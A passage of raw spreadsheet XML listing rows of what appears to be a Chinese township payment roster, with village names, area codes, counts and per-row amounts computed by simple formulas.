      <c r="I2392" s="14"/>
      <c r="J2392" s="14"/>
      <c r="K2392" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2393" ht="23" customHeight="1" spans="1:11">
      <c r="A2393" s="13" t="s">
        <v>6248</v>
      </c>
      <c r="B2393" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2393" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2393" s="14" t="s">
        <v>6249</v>
      </c>
      <c r="E2393" s="14" t="s">
        <v>6250</v>
      </c>
      <c r="F2393" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2393" s="14">
        <v>2</v>
      </c>
      <c r="H2393" s="14">
        <v>300</v>
      </c>
      <c r="I2393" s="14">
        <f>H2393*G2393</f>
        <v>600</v>
      </c>
      <c r="J2393" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2393" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2394" ht="23" customHeight="1" spans="1:11">
      <c r="A2394" s="13" t="s">
        <v>6251</v>
      </c>
      <c r="B2394" s="14" t="str">
        <f>B2393</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2394" s="14" t="str">
        <f>C2393</f>
        <v>供销社</v>
      </c>
      <c r="D2394" s="19" t="s">
        <v>6252</v>
      </c>
      <c r="E2394" s="19" t="s">
        <v>6253</v>
      </c>
      <c r="F2394" s="14" t="str">
        <f>F2393</f>
        <v>4113210705</v>
      </c>
      <c r="G2394" s="14"/>
      <c r="H2394" s="14"/>
      <c r="I2394" s="14"/>
      <c r="J2394" s="14"/>
      <c r="K2394" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2395" ht="23" customHeight="1" spans="1:11">
      <c r="A2395" s="13" t="s">
        <v>6254</v>
      </c>
      <c r="B2395" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2395" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2395" s="14" t="s">
        <v>6255</v>
      </c>
      <c r="E2395" s="14" t="s">
        <v>5617</v>
      </c>
      <c r="F2395" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2395" s="14">
        <v>1</v>
      </c>
      <c r="H2395" s="14">
        <v>340</v>
      </c>
      <c r="I2395" s="14">
        <f>H2395*G2395</f>
        <v>340</v>
      </c>
      <c r="J2395" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2395" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2396" ht="23" customHeight="1" spans="1:11">
      <c r="A2396" s="13" t="s">
        <v>6256</v>
      </c>
      <c r="B2396" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2396" s="14" t="s">
        <v>6257</v>
      </c>
      <c r="D2396" s="14" t="s">
        <v>6258</v>
      </c>
      <c r="E2396" s="14" t="s">
        <v>5755</v>
      </c>
      <c r="F2396" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2396" s="14">
        <v>1</v>
      </c>
      <c r="H2396" s="14">
        <v>340</v>
      </c>
      <c r="I2396" s="14">
        <f>H2396*G2396</f>
        <v>340</v>
      </c>
      <c r="J2396" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2396" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2397" ht="23" customHeight="1" spans="1:11">
      <c r="A2397" s="13" t="s">
        <v>6259</v>
      </c>
      <c r="B2397" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2397" s="14" t="s">
        <v>6257</v>
      </c>
      <c r="D2397" s="14" t="s">
        <v>6260</v>
      </c>
      <c r="E2397" s="14" t="s">
        <v>6261</v>
      </c>
      <c r="F2397" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2397" s="14">
        <v>1</v>
      </c>
      <c r="H2397" s="14">
        <v>340</v>
      </c>
      <c r="I2397" s="14">
        <f>H2397*G2397</f>
        <v>340</v>
      </c>
      <c r="J2397" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2397" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2398" ht="23" customHeight="1" spans="1:11">
      <c r="A2398" s="13" t="s">
        <v>6262</v>
      </c>
      <c r="B2398" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2398" s="14" t="s">
        <v>6263</v>
      </c>
      <c r="D2398" s="14" t="s">
        <v>6264</v>
      </c>
      <c r="E2398" s="14" t="s">
        <v>6265</v>
      </c>
      <c r="F2398" s="14" t="s">
        <v>6266</v>
      </c>
      <c r="G2398" s="14">
        <v>1</v>
      </c>
      <c r="H2398" s="14">
        <v>340</v>
      </c>
      <c r="I2398" s="14">
        <f>H2398*G2398</f>
        <v>340</v>
      </c>
      <c r="J2398" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2398" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2399" ht="23" customHeight="1" spans="1:11">
      <c r="A2399" s="13" t="s">
        <v>6267</v>
      </c>
      <c r="B2399" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2399" s="14" t="s">
        <v>6263</v>
      </c>
      <c r="D2399" s="14" t="s">
        <v>6268</v>
      </c>
      <c r="E2399" s="14" t="s">
        <v>6269</v>
      </c>
      <c r="F2399" s="14" t="s">
        <v>6266</v>
      </c>
      <c r="G2399" s="14">
        <v>2</v>
      </c>
      <c r="H2399" s="14">
        <v>300</v>
      </c>
      <c r="I2399" s="14">
        <f>H2399*G2399</f>
        <v>600</v>
      </c>
      <c r="J2399" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2399" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2400" ht="23" customHeight="1" spans="1:11">
      <c r="A2400" s="13" t="s">
        <v>6270</v>
      </c>
      <c r="B2400" s="14" t="str">
        <f>B2399</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2400" s="14" t="str">
        <f>C2399</f>
        <v>水泥厂</v>
      </c>
      <c r="D2400" s="18" t="s">
        <v>6271</v>
      </c>
      <c r="E2400" s="18" t="s">
        <v>6272</v>
      </c>
      <c r="F2400" s="14" t="str">
        <f>F2399</f>
        <v>411321071405</v>
      </c>
      <c r="G2400" s="14"/>
      <c r="H2400" s="14"/>
      <c r="I2400" s="14"/>
      <c r="J2400" s="14"/>
      <c r="K2400" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2401" ht="23" customHeight="1" spans="1:11">
      <c r="A2401" s="13" t="s">
        <v>6273</v>
      </c>
      <c r="B2401" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2401" s="14" t="s">
        <v>6263</v>
      </c>
      <c r="D2401" s="14" t="s">
        <v>6274</v>
      </c>
      <c r="E2401" s="14" t="s">
        <v>6079</v>
      </c>
      <c r="F2401" s="14" t="s">
        <v>6266</v>
      </c>
      <c r="G2401" s="14">
        <v>2</v>
      </c>
      <c r="H2401" s="14">
        <v>300</v>
      </c>
      <c r="I2401" s="14">
        <f>H2401*G2401</f>
        <v>600</v>
      </c>
      <c r="J2401" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2401" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2402" ht="23" customHeight="1" spans="1:11">
      <c r="A2402" s="13" t="s">
        <v>6275</v>
      </c>
      <c r="B2402" s="14" t="str">
        <f>B2401</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2402" s="14" t="str">
        <f>C2401</f>
        <v>水泥厂</v>
      </c>
      <c r="D2402" s="18" t="s">
        <v>6276</v>
      </c>
      <c r="E2402" s="71" t="s">
        <v>428</v>
      </c>
      <c r="F2402" s="14" t="str">
        <f>F2401</f>
        <v>411321071405</v>
      </c>
      <c r="G2402" s="14"/>
      <c r="H2402" s="14"/>
      <c r="I2402" s="14"/>
      <c r="J2402" s="14"/>
      <c r="K2402" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2403" ht="23" customHeight="1" spans="1:11">
      <c r="A2403" s="13" t="s">
        <v>6277</v>
      </c>
      <c r="B2403" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2403" s="14" t="s">
        <v>6263</v>
      </c>
      <c r="D2403" s="14" t="s">
        <v>6278</v>
      </c>
      <c r="E2403" s="14" t="s">
        <v>6146</v>
      </c>
      <c r="F2403" s="14" t="s">
        <v>6266</v>
      </c>
      <c r="G2403" s="14">
        <v>1</v>
      </c>
      <c r="H2403" s="14">
        <v>340</v>
      </c>
      <c r="I2403" s="14">
        <f t="shared" ref="I2403:I2422" si="113">H2403*G2403</f>
        <v>340</v>
      </c>
      <c r="J2403" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2403" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2404" ht="23" customHeight="1" spans="1:11">
      <c r="A2404" s="13" t="s">
        <v>6279</v>
      </c>
      <c r="B2404" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2404" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2404" s="14" t="s">
        <v>6280</v>
      </c>
      <c r="E2404" s="14" t="s">
        <v>6011</v>
      </c>
      <c r="F2404" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2404" s="14">
        <v>1</v>
      </c>
      <c r="H2404" s="14">
        <v>340</v>
      </c>
      <c r="I2404" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2404" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2404" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2405" ht="23" customHeight="1" spans="1:11">
      <c r="A2405" s="13" t="s">
        <v>6281</v>
      </c>
      <c r="B2405" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2405" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2405" s="14" t="s">
        <v>6282</v>
      </c>
      <c r="E2405" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2405" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2405" s="14">
        <v>1</v>
      </c>
      <c r="H2405" s="14">
        <v>340</v>
      </c>
      <c r="I2405" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2405" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2405" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2406" ht="23" customHeight="1" spans="1:11">
      <c r="A2406" s="13" t="s">
        <v>6283</v>
      </c>
      <c r="B2406" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2406" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2406" s="14" t="s">
        <v>6284</v>
      </c>
      <c r="E2406" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2406" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2406" s="14">
        <v>1</v>
      </c>
      <c r="H2406" s="14">
        <v>340</v>
      </c>
      <c r="I2406" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2406" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2406" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2407" ht="23" customHeight="1" spans="1:11">
      <c r="A2407" s="13" t="s">
        <v>6285</v>
      </c>
      <c r="B2407" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2407" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2407" s="14" t="s">
        <v>6287</v>
      </c>
      <c r="E2407" s="14" t="s">
        <v>6214</v>
      </c>
      <c r="F2407" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2407" s="14">
        <v>1</v>
      </c>
      <c r="H2407" s="14">
        <v>340</v>
      </c>
      <c r="I2407" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2407" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2407" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2408" ht="23" customHeight="1" spans="1:11">
      <c r="A2408" s="13" t="s">
        <v>6289</v>
      </c>
      <c r="B2408" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2408" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2408" s="14" t="s">
        <v>6290</v>
      </c>
      <c r="E2408" s="14" t="s">
        <v>5902</v>
      </c>
      <c r="F2408" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2408" s="14">
        <v>1</v>
      </c>
      <c r="H2408" s="14">
        <v>340</v>
      </c>
      <c r="I2408" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2408" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2408" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2409" ht="23" customHeight="1" spans="1:11">
      <c r="A2409" s="13" t="s">
        <v>6291</v>
      </c>
      <c r="B2409" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2409" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2409" s="14" t="s">
        <v>6292</v>
      </c>
      <c r="E2409" s="14" t="s">
        <v>5575</v>
      </c>
      <c r="F2409" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2409" s="14">
        <v>1</v>
      </c>
      <c r="H2409" s="14">
        <v>340</v>
      </c>
      <c r="I2409" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2409" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2409" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2410" ht="23" customHeight="1" spans="1:11">
      <c r="A2410" s="13" t="s">
        <v>6293</v>
      </c>
      <c r="B2410" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2410" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2410" s="14" t="s">
        <v>6294</v>
      </c>
      <c r="E2410" s="14" t="s">
        <v>5248</v>
      </c>
      <c r="F2410" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2410" s="14">
        <v>1</v>
      </c>
      <c r="H2410" s="14">
        <v>340</v>
      </c>
      <c r="I2410" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2410" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2410" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2411" ht="23" customHeight="1" spans="1:11">
      <c r="A2411" s="13" t="s">
        <v>6295</v>
      </c>
      <c r="B2411" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2411" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2411" s="14" t="s">
        <v>6296</v>
      </c>
      <c r="E2411" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2411" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2411" s="14">
        <v>1</v>
      </c>
      <c r="H2411" s="14">
        <v>340</v>
      </c>
      <c r="I2411" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2411" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2411" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2412" ht="23" customHeight="1" spans="1:11">
      <c r="A2412" s="13" t="s">
        <v>6297</v>
      </c>
      <c r="B2412" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2412" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2412" s="14" t="s">
        <v>6298</v>
      </c>
      <c r="E2412" s="14" t="s">
        <v>6299</v>
      </c>
      <c r="F2412" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2412" s="14">
        <v>1</v>
      </c>
      <c r="H2412" s="14">
        <v>340</v>
      </c>
      <c r="I2412" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2412" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2412" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2413" ht="23" customHeight="1" spans="1:11">
      <c r="A2413" s="13" t="s">
        <v>6300</v>
      </c>
      <c r="B2413" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2413" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2413" s="14" t="s">
        <v>6301</v>
      </c>
      <c r="E2413" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2413" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2413" s="14">
        <v>1</v>
      </c>
      <c r="H2413" s="14">
        <v>340</v>
      </c>
      <c r="I2413" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2413" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2413" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2414" ht="23" customHeight="1" spans="1:11">
      <c r="A2414" s="13" t="s">
        <v>6302</v>
      </c>
      <c r="B2414" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2414" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2414" s="14" t="s">
        <v>6303</v>
      </c>
      <c r="E2414" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2414" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2414" s="14">
        <v>1</v>
      </c>
      <c r="H2414" s="14">
        <v>340</v>
      </c>
      <c r="I2414" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2414" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2414" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2415" ht="23" customHeight="1" spans="1:11">
      <c r="A2415" s="13" t="s">
        <v>6304</v>
      </c>
      <c r="B2415" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2415" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2415" s="14" t="s">
        <v>6305</v>
      </c>
      <c r="E2415" s="14" t="s">
        <v>5202</v>
      </c>
      <c r="F2415" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2415" s="14">
        <v>1</v>
      </c>
      <c r="H2415" s="14">
        <v>340</v>
      </c>
      <c r="I2415" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2415" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2415" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2416" ht="23" customHeight="1" spans="1:11">
      <c r="A2416" s="13" t="s">
        <v>6306</v>
      </c>
      <c r="B2416" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2416" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2416" s="14" t="s">
        <v>6307</v>
      </c>
      <c r="E2416" s="14" t="s">
        <v>5735</v>
      </c>
      <c r="F2416" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2416" s="14">
        <v>1</v>
      </c>
      <c r="H2416" s="14">
        <v>340</v>
      </c>
      <c r="I2416" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2416" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2416" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2417" ht="23" customHeight="1" spans="1:11">
      <c r="A2417" s="13" t="s">
        <v>6308</v>
      </c>
      <c r="B2417" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2417" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2417" s="14" t="s">
        <v>6309</v>
      </c>
      <c r="E2417" s="14" t="s">
        <v>5767</v>
      </c>
      <c r="F2417" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2417" s="14">
        <v>1</v>
      </c>
      <c r="H2417" s="14">
        <v>340</v>
      </c>
      <c r="I2417" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2417" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2417" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2418" ht="23" customHeight="1" spans="1:11">
      <c r="A2418" s="13" t="s">
        <v>6310</v>
      </c>
      <c r="B2418" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2418" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2418" s="14" t="s">
        <v>6311</v>
      </c>
      <c r="E2418" s="14" t="s">
        <v>6312</v>
      </c>
      <c r="F2418" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2418" s="14">
        <v>1</v>
      </c>
      <c r="H2418" s="14">
        <v>340</v>
      </c>
      <c r="I2418" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2418" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2418" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2419" ht="23" customHeight="1" spans="1:11">
      <c r="A2419" s="13" t="s">
        <v>6313</v>
      </c>
      <c r="B2419" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2419" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2419" s="14" t="s">
        <v>6314</v>
      </c>
      <c r="E2419" s="14" t="s">
        <v>5931</v>
      </c>
      <c r="F2419" s="14" t="s">
        <v>6315</v>
      </c>
      <c r="G2419" s="14">
        <v>1</v>
      </c>
      <c r="H2419" s="14">
        <v>340</v>
      </c>
      <c r="I2419" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2419" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2419" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2420" ht="23" customHeight="1" spans="1:11">
      <c r="A2420" s="13" t="s">
        <v>6316</v>
      </c>
      <c r="B2420" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2420" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2420" s="14" t="s">
        <v>6317</v>
      </c>
      <c r="E2420" s="14" t="s">
        <v>5620</v>
      </c>
      <c r="F2420" s="14" t="s">
        <v>6315</v>
      </c>
      <c r="G2420" s="14">
        <v>1</v>
      </c>
      <c r="H2420" s="14">
        <v>340</v>
      </c>
      <c r="I2420" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2420" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2420" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2421" ht="23" customHeight="1" spans="1:11">
      <c r="A2421" s="13" t="s">
        <v>6318</v>
      </c>
      <c r="B2421" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2421" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2421" s="14" t="s">
        <v>6319</v>
      </c>
      <c r="E2421" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2421" s="14" t="s">
        <v>6320</v>
      </c>
      <c r="G2421" s="14">
        <v>1</v>
      </c>
      <c r="H2421" s="14">
        <v>340</v>
      </c>
      <c r="I2421" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2421" s="14" t="s">
        <v>4751</v>
      </c>
      <c r="K2421" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2422" ht="23" customHeight="1" spans="1:11">
      <c r="A2422" s="13" t="s">
        <v>6321</v>
      </c>
      <c r="B2422" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2422" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2422" s="14" t="s">
        <v>6322</v>
      </c>
      <c r="E2422" s="14" t="s">
        <v>6323</v>
      </c>
      <c r="F2422" s="90" t="s">
        <v>6320</v>
      </c>
      <c r="G2422" s="14">
        <v>1</v>
      </c>
      <c r="H2422" s="14">
        <v>340</v>
      </c>
      <c r="I2422" s="14">
        <f t="shared" si="113"/>
        <v>340</v>
      </c>
      <c r="J2422" s="24">
        <v>45627</v>
      </c>
      <c r="K2422" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2423" ht="23" customHeight="1" spans="1:11">
      <c r="A2423" s="13" t="s">
        <v>6324</v>
      </c>
      <c r="B2423" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2423" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2423" s="14" t="s">
        <v>6325</v>
      </c>
      <c r="E2423" s="14" t="s">
        <v>5610</v>
      </c>
      <c r="F2423" s="14" t="s">
        <v>6320</v>
      </c>
      <c r="G2423" s="14">
        <v>1</v>
      </c>
      <c r="H2423" s="14">
        <v>340</v>
      </c>
      <c r="I2423" s="14">
        <f t="shared" ref="I2423:I2427" si="114">H2423*G2423</f>
        <v>340</v>
      </c>
      <c r="J2423" s="14" t="s">
        <v>6326</v>
      </c>
      <c r="K2423" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2424" ht="23" customHeight="1" spans="1:11">
      <c r="A2424" s="13" t="s">
        <v>6327</v>
      </c>
      <c r="B2424" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2424" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2424" s="14" t="s">
        <v>6328</v>
      </c>
      <c r="E2424" s="14" t="s">
        <v>5701</v>
      </c>
      <c r="F2424" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2424" s="14">
        <v>1</v>
      </c>
      <c r="H2424" s="14">
        <v>340</v>
      </c>
      <c r="I2424" s="14">
        <f t="shared" si="114"/>
        <v>340</v>
      </c>
      <c r="J2424" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2424" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2425" s="5" customFormat="1" ht="23" customHeight="1" spans="1:11">
      <c r="A2425" s="13" t="s">
        <v>6329</v>
      </c>
      <c r="B2425" s="72" t="s">
        <v>5572</v>
      </c>
      <c r="C2425" s="72" t="s">
        <v>6286</v>
      </c>
      <c r="D2425" s="73" t="s">
        <v>6330</v>
      </c>
      <c r="E2425" s="74" t="s">
        <v>6331</v>
      </c>
      <c r="F2425" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2425" s="14">
        <v>1</v>
      </c>
      <c r="H2425" s="14">
        <v>340</v>
      </c>
      <c r="I2425" s="14">
        <f t="shared" si="114"/>
        <v>340</v>
      </c>
      <c r="J2425" s="75" t="s">
        <v>3172</v>
      </c>
      <c r="K2425" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2426" ht="23" customHeight="1" spans="1:11">
      <c r="A2426" s="13" t="s">
        <v>6332</v>
      </c>
      <c r="B2426" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2426" s="14" t="s">
        <v>6286</v>
      </c>
      <c r="D2426" s="14" t="s">
        <v>6333</v>
      </c>
      <c r="E2426" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2426" s="14" t="s">
        <v>6288</v>
      </c>
      <c r="G2426" s="14">
        <v>1</v>
      </c>
      <c r="H2426" s="14">
        <v>340</v>
      </c>
      <c r="I2426" s="14">
        <f t="shared" si="114"/>
        <v>340</v>
      </c>
      <c r="J2426" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2426" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2427" ht="23" customHeight="1" spans="1:11">
      <c r="A2427" s="13" t="s">
        <v>6334</v>
      </c>
      <c r="B2427" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2427" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="D2427" s="14" t="s">
        <v>6336</v>
      </c>
      <c r="E2427" s="14" t="s">
        <v>6337</v>
      </c>
      <c r="F2427" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2427" s="14">
        <v>3</v>
      </c>
      <c r="H2427" s="14">
        <v>265</v>
      </c>
      <c r="I2427" s="14">
        <f t="shared" si="114"/>
        <v>795</v>
      </c>
      <c r="J2427" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2427" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2428" ht="23" customHeight="1" spans="1:11">
      <c r="A2428" s="13" t="s">
        <v>6339</v>
      </c>
      <c r="B2428" s="14" t="str">
        <f>B2427</f>
        <v>石门乡</v>
      </c>
      <c r="C2428" s="14" t="str">
        <f>C2427</f>
        <v>石门乡</v>
      </c>
      <c r="D2428" s="20" t="s">
        <v>6340</v>
      </c>
      <c r="E2428" s="27" t="s">
        <v>6341</v>
      </c>
      <c r="F2428" s="14" t="str">
        <f>F2427</f>
        <v>4113210920</v>
      </c>
      <c r="G2428" s="14"/>
      <c r="H2428" s="14"/>
      <c r="I2428" s="14"/>
      <c r="J2428" s="14"/>
      <c r="K2428" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2429" ht="23" customHeight="1" spans="1:11">
      <c r="A2429" s="13" t="s">
        <v>6342</v>
      </c>
      <c r="B2429" s="14" t="str">
        <f>B2428</f>
        <v>石门乡</v>
      </c>
      <c r="C2429" s="14" t="str">
        <f>C2428</f>
        <v>石门乡</v>
      </c>
      <c r="D2429" s="20" t="s">
        <v>6343</v>
      </c>
      <c r="E2429" s="27" t="s">
        <v>6344</v>
      </c>
      <c r="F2429" s="14" t="str">
        <f>F2428</f>
        <v>4113210920</v>
      </c>
      <c r="G2429" s="14"/>
      <c r="H2429" s="14"/>
      <c r="I2429" s="14"/>
      <c r="J2429" s="14"/>
      <c r="K2429" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2430" ht="23" customHeight="1" spans="1:11">
      <c r="A2430" s="13" t="s">
        <v>6345</v>
      </c>
      <c r="B2430" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2430" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="D2430" s="14" t="s">
        <v>6346</v>
      </c>
      <c r="E2430" s="14" t="s">
        <v>6347</v>
      </c>
      <c r="F2430" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2430" s="14">
        <v>1</v>
      </c>
      <c r="H2430" s="14">
        <v>340</v>
      </c>
      <c r="I2430" s="14">
        <f>H2430*G2430</f>
        <v>340</v>
      </c>
      <c r="J2430" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2430" s="14" t="s">
        <v>225</v>
      </c>
    </row>
